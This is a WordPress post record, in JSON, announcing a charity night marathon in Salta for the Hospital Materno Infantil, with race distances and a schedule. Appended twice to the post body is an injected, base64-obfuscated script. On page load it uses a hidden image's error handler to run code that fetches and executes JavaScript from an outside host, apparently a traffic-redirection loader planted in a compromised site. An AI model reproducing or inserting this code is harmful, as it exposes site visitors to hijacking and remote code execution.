{"id":4863,"date":"2025-02-20T12:11:58","date_gmt":"2025-02-20T15:11:58","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4863"},"modified":"2025-08-13T23:40:16","modified_gmt":"2025-08-14T02:40:16","slug":"el-sabado-se-correra-la-maraton-de-las-luces","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4863","title":{"rendered":"El s\u00e1bado se correr\u00e1 la Marat\u00f3n de las Luces"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-2e660a85cc33cc3dbb7a41311a90420a\" style=\"background-color:#0a5b8a\"><em>El evento, a beneficio del Hospital Materno Infantil, se realizar\u00e1 en el Parque Bicentenario en horario nocturno, con el objetivo de recaudar fondos para realizar obras y mejoras en el nosocomio.<\/em><\/h4>\n\n\n\n<p>Esta ma\u00f1ana se realiz\u00f3 el lanzamiento de la primera edici\u00f3n de la Marat\u00f3n de las Luces, que es organizada por la Fundaci\u00f3n del Hospital Materno Infantil. El evento tendr\u00e1 lugar este s\u00e1bado 22 de febrero, desde las 19, en el Parque Bicentenario.<\/p>\n\n\n\n<p>La marat\u00f3n ser\u00e1 a beneficio del hospital. Los fondos recaudados se destinar\u00e1n a la construcci\u00f3n del nuevo patio para embarazadas, un espacio pensado para brindar mayor comodidad y humanizaci\u00f3n en la atenci\u00f3n a las futuras mam\u00e1s durante su estad\u00eda en el hospital.<\/p>\n\n\n\n<p>Habr\u00e1 tres distancias disponibles: 3K (participativa) y 6K y 12K (ambas competitivas). El evento est\u00e1 destinado a corredores de todas las edades y condiciones. Las inscripciones seguir\u00e1n abiertas hasta el viernes 21, a trav\u00e9s de bubilo.com.ar\/hpmi.<\/p>\n\n\n\n<p>El circuito se traz\u00f3 dentro del predio del Parque Bicentenario y se pide a los corredores llevar linternas para ir iluminando el camino ya que la competencia se realizar\u00e1 en horario nocturno, d\u00e1ndole el nombre a la Marat\u00f3n.<\/p>\n\n\n\n<p>En el acto estuvo presente el director de Recreaci\u00f3n e Inclusi\u00f3n de la Secretar\u00eda de Deportes,&nbsp;<strong>Jos\u00e9 Tolaba<\/strong>. El evento cuenta con la colaboraci\u00f3n del Gobierno de Salta, a trav\u00e9s del Ministerio de Turismo y Deporte.<\/p>\n\n\n\n<p><strong>Cronograma de actividades del d\u00eda s\u00e1bado:&nbsp;<\/strong><\/p>\n\n\n\n<p>*- 19.00 hs: Concentraci\u00f3n<br>*- 19.45 hs: Largada 3K y 6K<br>*- 20.15 hs: Largada 12K<br>*- 21.30 hs: Premiaci\u00f3n<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El evento, a beneficio del Hospital Materno Infantil, se realizar\u00e1 en el Parque Bicentenario en horario nocturno, con el objetivo de recaudar fondos para realizar obras y mejoras en el nosocomio. Esta ma\u00f1ana se realiz\u00f3 el lanzamiento de la primera edici\u00f3n de la Marat\u00f3n de las Luces, que es organizada por la Fundaci\u00f3n del Hospital [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4864,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18],"tags":[],"class_list":{"0":"post-4863","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4863"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4863"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4863\/revisions"}],"predecessor-version":[{"id":6567,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4863\/revisions\/6567"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4864"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4863"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4863"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4863"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}